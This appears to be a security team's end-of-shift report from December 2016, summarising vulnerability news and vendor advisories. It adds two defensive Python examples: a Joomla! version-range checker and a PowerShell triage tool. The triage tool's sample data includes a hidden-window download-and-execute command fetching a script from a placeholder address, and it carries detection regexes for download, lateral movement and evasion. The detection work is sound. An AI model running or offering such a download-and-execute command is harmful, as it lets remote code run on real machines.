End-of-Shift report
Timeframe: Wednesday 07-12-2016 18:00 - Friday 09-12-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
Product warning for Joomla!
[...] A security vulnerability has been discovered in Joomla! versions 3.4.4 up to and including 3.6.4 that allows an attacker from the Internet to execute arbitrary code and thereby cause considerable damage on an affected...
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/warnmeldung_tw-t16-0140.html
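A quick range check for the versions named in the warning, added here as an example (it is not part of the BSI advisory or of Joomla!): it reads the <version> element of a Joomla! 3.x core manifest, administrator/manifests/files/joomla.xml, and reports whether the install falls inside 3.4.4 to 3.6.4 inclusive. The sample manifest embedded below is constructed, and the on-disk path in check_install() assumes the standard Joomla! 3.x layout.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Optional, Tuple

# Affected range as stated in the warning: 3.4.4 up to and including 3.6.4.
AFFECTED_MIN = (3, 4, 4)
AFFECTED_MAX = (3, 6, 4)

# Constructed sample modelled on the layout of administrator/manifests/files/joomla.xml;
# not a copy of a real Joomla! manifest.
SAMPLE_MANIFEST = """<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.6.4</version>
</extension>"""


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '3.6.4' (a trailing suffix such as '-dev' is ignored) into a comparable tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = m.groups(default="0")
    return int(major), int(minor), int(patch)


def is_affected(version: str) -> bool:
    """True if the version lies inside the affected range from the warning."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def version_from_manifest(xml_text: str) -> Optional[str]:
    """Read the <version> element of a Joomla! core file manifest."""
    node = ET.fromstring(xml_text).find("version")
    return node.text.strip() if node is not None and node.text else None


def check_install(webroot: str) -> str:
    """Check an on-disk install; the manifest path assumes the Joomla! 3.x layout."""
    manifest = Path(webroot) / "administrator" / "manifests" / "files" / "joomla.xml"
    version = version_from_manifest(manifest.read_text(encoding="utf-8"))
    if version is None:
        return "unknown: no <version> element in manifest"
    return f"{version}: {'AFFECTED' if is_affected(version) else 'outside affected range'}"


if __name__ == "__main__":
    v = version_from_manifest(SAMPLE_MANIFEST)
    print(v, "affected" if is_affected(v) else "not affected")
```

Point check_install() at the web root of each Joomla! site you operate; versions above 3.6.4 are simply reported as outside the range the warning names, since the warning text does not state a fixed version.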
Root privileges through a Linux vulnerability
A vulnerability has existed in the Linux kernel for five years that lets local users gain elevated privileges. Android is affected as well.
https://heise.de/-3565365
Mobile Ransomware: Pocket-Sized Badness
A few weeks ago, I spoke at Black Hat Europe 2016 on Pocket-Sized Badness: Why Ransomware Comes as a Plot Twist in the Cat-Mouse Game. While watching mobile ransomware from April 2015 to April 2016, I noticed a big spike in the number of Android ransomware samples. During that year, the number of Android ransomware increased by 140%. In certain areas, mobile ransomware accounts for up to 22 percent of mobile malware overall! (These numbers were obtained from the Trend Micro Mobile App...
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/hPA6z0gnzFE/
Managed Exchange service: Telekom cloud customer could view other customers' address books
Due to a configuration error, a user of the Telekom cloud services was briefly able to access other customers' address books, reportedly including those of law enforcement agencies. The cause was apparently a permissions error in the Exchange service. (Telekom, data protection)
http://www.golem.de/news/managed-exchange-dienst-telekom-cloud-kunde-konnte-fremde-adressbuecher-einsehen-1612-124963-rss.html
Crooks Start Deploying New "August" Infostealer
During the month of November 2016, a cyber-crime group started deploying a new malware family nicknamed "August," used mainly for information gathering and reconnaissance on the infected target's computer. [...]
https://www.bleepingcomputer.com/news/security/crooks-start-deploying-new-august-infostealer/
PowerShell threats surge: 95.4 percent of analyzed scripts were malicious
Symantec analyzed 111 threat families that use PowerShell, finding that they leverage the framework to download payloads and traverse through networks.
https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious
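A small triage routine for PowerShell command lines, added here as an example and not taken from Symantec's analysis (it does not reproduce their 111 families): it decodes -EncodedCommand payloads and flags the behaviours the item names, payload download and traversal to other hosts, together with the execution-policy and window-hiding switches that usually accompany them. The command lines in SAMPLE_COMMAND_LINES are constructed, and the indicator lists and risk thresholds are this example's own choices, not Symantec's.

```python
import base64
import re
from typing import Dict, List, Tuple

# Constructed sample command lines in the style of process-creation telemetry (Sysmon event 1,
# Windows event 4688); none is from Symantec's dataset. The third is built at import time so the
# base64 is guaranteed to be well-formed UTF-16LE, which is what -EncodedCommand expects.
SAMPLE_COMMAND_LINES: List[str] = [
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/a.ps1\')"',
    'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    'powershell.exe -EncodedCommand '
    + base64.b64encode('Invoke-Command -ComputerName srv02 -ScriptBlock { Get-Process }'.encode('utf-16le')).decode('ascii'),
    'powershell.exe Get-ChildItem C:\\Users',
]

# Behaviour classes, each with a regex applied to the (decoded) command line.
INDICATORS: Dict[str, re.Pattern] = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer|\biwr\b", re.I),
    "execute_in_memory": re.compile(r"\biex\b|invoke-expression", re.I),
    "lateral_movement": re.compile(r"invoke-command|enter-pssession|-computername|invoke-wmimethod", re.I),
    "evasion": re.compile(r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Tuple[str, bool]:
    """Replace an -EncodedCommand argument by its UTF-16LE plaintext; the flag says whether one was present."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        plain = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, True  # encoded but not decodable: still worth flagging
    return cmdline[: m.start()] + plain + cmdline[m.end():], True


def risk_level(hits: List[str]) -> str:
    """Download-and-execute is high on its own; encoding or evasion plus any other indicator also is."""
    if "download" in hits and "execute_in_memory" in hits:
        return "high"
    if ("encoded" in hits or "evasion" in hits) and len(hits) >= 2:
        return "high"
    return "medium" if hits else "low"


def classify(cmdline: str) -> Dict[str, object]:
    """Decode, match every indicator class, and attach a risk level."""
    decoded, was_encoded = decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if was_encoded:
        hits.append("encoded")
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "risk": risk_level(hits)}


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    return [classify(c) for c in cmdlines]


if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(f"{r['risk']:6} {r['indicators']}  {r['decoded'][:80]}")
```

Feed it the command-line field of your process-creation events; decoding before matching matters, because an encoded Invoke-Command or DownloadString never appears in the raw telemetry string. The "medium" verdict on the -ExecutionPolicy Bypass backup script shows the expected false-positive surface: that switch alone is common in legitimate scheduled tasks, which is why it only raises the level when combined with another indicator.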
Kaspersky Security Bulletin 2016. The ransomware revolution
Between January and September 2016 ransomware attacks on business increased three-fold - to the equivalent of an attack every 40 seconds. With the ransomware-as-a-service economy booming, and the launch of the NoMoreRansom project, Kaspersky Lab has named ransomware its key topic for 2016.
http://securelist.com/analysis/kaspersky-security-bulletin/76757/kaspersky-security-bulletin-2016-story-of-the-year/
Banking Trojan Uses Gmail Popup to Extend Infection to Victim's Android Phone
A group of malware authors has come up with a new method of extending an infection from the user's computer to their Android smartphone. [...]
https://www.bleepingcomputer.com/news/security/banking-trojan-uses-gmail-popup-to-extend-infection-to-victims-android-phone/
Industrial espionage: How Thyssenkrupp found its attackers
How do you protect your network when you have 150,000 employees and 500 subsidiaries? After an attack, Thyssenkrupp learned that it takes two things: sufficient resources and freedom for the team.
http://www.golem.de/news/industriespionage-wie-thyssenkrupp-seine-angreifer-fand-1612-124988-rss.html
Now Mirai Has DGA Feature Built in
Nearly 2 weeks ago, 2 new infection vectors (aka TCP ports 7547 and 5555) were found being used to spread Mirai malware. My colleague Gensheng quickly set up some honeypots for that sort of vector and soon had his harvest: 11 samples were captured on Nov 28th. So far 53 unique samples have been captured by our honeypots from 6 hosting servers.
http://blog.netlab.360.com/new-mirai-variant-with-dga/
Crypto-Trojan: Locky's greedy brother demands over 2000 euros in ransom
The GoldenEye ransomware Trojan is not the only current nuisance; the relatives of the notorious Locky Trojan are also continuing their raids. A variant called Osiris is currently striking more often and demands a hefty ransom.
https://heise.de/-3564812
Bugtraq: AST-2016-009:
http://www.securityfocus.com/archive/1/539888
Bugtraq: AST-2016-008: Crash on SDP offer or answer from endpoint using Opus
http://www.securityfocus.com/archive/1/539887
DFN-CERT-2016-2010: Sophos UTM: Multiple vulnerabilities allow, among other things, execution of arbitrary code
https://portal.cert.dfn.de/adv/DFN-CERT-2016-2010/
DFN-CERT-2016-1991: FreeBSD: Multiple vulnerabilities allow, among other things, execution of arbitrary code
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1991/
DSA-3729 xen - security update
Multiple vulnerabilities have been discovered in the Xen hypervisor. The Common Vulnerabilities and Exposures project identifies the following problems:...
https://www.debian.org/security/2016/dsa-3729
Cisco Email Security Appliance Content Filter Bypass Vulnerability
A vulnerability in the content filtering functionality of Cisco AsyncOS Software for Cisco Email Security Appliances could allow an unauthenticated, remote attacker to bypass user filters that are configured for an affected device. The vulnerability is due to improper filtering of certain TAR format files that are attached to email messages. An attacker could exploit this vulnerability by sending an email message that has a crafted TAR file attachment through an affected device.
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161207-esa
F5 Security Advisories
Security Advisory: libxml2 vulnerabilities CVE-2016-4447 and CVE-2016-4449
https://support.f5.com:443/kb/en-us/solutions/public/k/24/sol24322529.html?ref=rss
Security Advisory: PHP vulnerability CVE-2016-6290
https://support.f5.com:443/kb/en-us/solutions/public/k/15/sol15850913.html?ref=rss
Security Advisory: libarchive vulnerability CVE-2016-5844
https://support.f5.com:443/kb/en-us/solutions/public/k/24/sol24036027.html?ref=rss
Security Advisory: PHP vulnerability CVE-2016-7126
https://support.f5.com:443/kb/en-us/solutions/public/k/40/sol40564589.html?ref=rss
Security Advisory: OpenSSL vulnerability CVE-2016-6302
https://support.f5.com:443/kb/en-us/solutions/public/k/70/sol70844615.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1836
https://support.f5.com:443/kb/en-us/solutions/public/k/48/sol48220300.html?ref=rss
Security Advisory: libarchive vulnerability CVE-2015-8932
https://support.f5.com:443/kb/en-us/solutions/public/k/90/sol90412202.html?ref=rss
Security Advisory: libarchive vulnerability CVE-2016-5418
https://support.f5.com:443/kb/en-us/solutions/public/k/35/sol35246595.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1835
https://support.f5.com:443/kb/en-us/solutions/public/k/43/sol43314223.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1837
https://support.f5.com:443/kb/en-us/solutions/public/k/05/sol05937379.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1833
https://support.f5.com:443/kb/en-us/solutions/public/k/62/sol62030064.html?ref=rss
Security Advisory: libxml2 vulnerability CVE-2016-1762
https://support.f5.com:443/kb/en-us/solutions/public/k/14/sol14338030.html?ref=rss
IBM Security Bulletins
IBM Security Bulletin: Multiple security vulnerabilities affect Liberty for Java for IBM Bluemix (CVE-2016-5573, CVE-2016-5597, CVE-2016-5983)
http://www.ibm.com/support/docview.wss?uid=swg21994945
IBM Security Bulletin: IBM i is affected by networking BIND vulnerabilities (CVE-2016-2775, CVE-2016-2776, CVE-2016-8864 and CVE-2016-6170)
http://www.ibm.com/support/docview.wss?uid=nas8N1021750
IBM Security Bulletin: Vulnerabilities in OpenSSL affect Power Hardware Management Console (CVE-2016-2180, CVE-2016-2182, CVE-2016-6306)
http://www.ibm.com/support/docview.wss?uid=nas8N1021733
IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Tivoli Network Manager IP Edition 3.9 Fix Pack 4 HTTPS support for Perl Collector
http://www.ibm.com/support/docview.wss?uid=swg21990532
IBM Security Bulletin: Vulnerabilities in DHCP affect Power Hardware Management Console (CVE-2015-8605 and CVE-2016-2774)
http://www-01.ibm.com/support/docview.wss?uid=nas8N1021703
IBM Security Bulletin: Multiple vulnerabilities affect IBM Security AppScan Enterprise
http://www-01.ibm.com/support/docview.wss?uid=swg21995118
IBM Security Bulletin: Open Source Apache Tomcat, Commons FileUpload vulnerabilities affecting IBM Algo Audit and Compliance (CVE-2016-3092)
http://www.ibm.com/support/docview.wss?uid=swg21993305
IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Flex System Manager (FSM) Storage Manager Install Anywhere (SMIA) configuration tool
http://www.ibm.com/support/docview.wss?uid=isg3T1024507
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Network Advisor (CVE-2016-3425, CVE-2016-3427, CVE-2016-0695).
http://www.ibm.com/support/docview.wss?uid=ssg1S1009640
IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM b-type SAN switches and directors and IBM Network Advisor (CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-0702, CVE-2016-0704, CVE-2016-2842).
http://www.ibm.com/support/docview.wss?uid=ssg1S1009631
IBM Security Bulletin: Vulnerability in pConsole impacts AIX (CVE-2016-0266)
http://aix.software.ibm.com/aix/efixes/security/pconsole_advisory2.asc
IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Fabric Manager (CVE-2016-2183)
https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099504
IBM Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2016-4003)
http://www-01.ibm.com/support/docview.wss?uid=swg21994399
IBM Security Bulletin: Apache Commons FileUpload Vulnerability affects IBM Rational ClearQuest (CVE-2016-3092)
http://www-01.ibm.com/support/docview.wss?uid=swg21993816
IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM SONAS
http://www.ibm.com/support/docview.wss?uid=ssg1S1009648
IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Rational ClearCase (CVE-2016-2177, CVE-2016-2178, CVE-2016-2183, CVE-2016-6302, CVE-2016-6303, CVE-2016-6304, CVE-2016-6306)
http://www.ibm.com/support/docview.wss?uid=swg21993514
IBM Security Bulletin: Tivoli Storage Manager (IBM Spectrum Protect) AIX Client Buffer Overflow (CVE-2016-5985)
http://www.ibm.com/support/docview.wss?uid=swg21993695
IBM Security Bulletin: A vulnerability in IBM Websphere affects IBM Tivoli Netcool Configuration Manager (ITNCM) (CVE-2016-5983)
http://www.ibm.com/support/docview.wss?uid=swg21992640
IBM Security Bulletin: Multiple security vulnerabilities affect the Report Builder and Data Collection Component that are shipped with Jazz Reporting Service (CVE-2016-5898, CVE-2016-5899, CVE-2016-6054, CVE-2016-6047)
http://www-01.ibm.com/support/docview.wss?uid=swg21991154
IBM Security Bulletin: Multiple security vulnerabilities affect the Lifecycle Query Engine (LQE) that is shipped with Jazz Reporting Service (CVE-2016-5897, CVE-2016-6039)
http://www-01.ibm.com/support/docview.wss?uid=swg21991153
IBM Security Bulletin: Samba vulnerability issue on IBM Storwize V7000 Unified (CVE-2016-2119)
http://www.ibm.com/support/docview.wss?uid=ssg1S1009567
IBM Security Bulletin: Apache Tomcat vulnerability affects IBM Storwize V7000 Unified (CVE-2016-3092)
http://www.ibm.com/support/docview.wss?uid=ssg1S1009566
IBM Security Bulletin: Vulnerabilities in OpenSSL, OpenVPN and GNU glibc affect IBM Security Virtual Server Protection for VMware
http://www-01.ibm.com/support/docview.wss?uid=swg21995039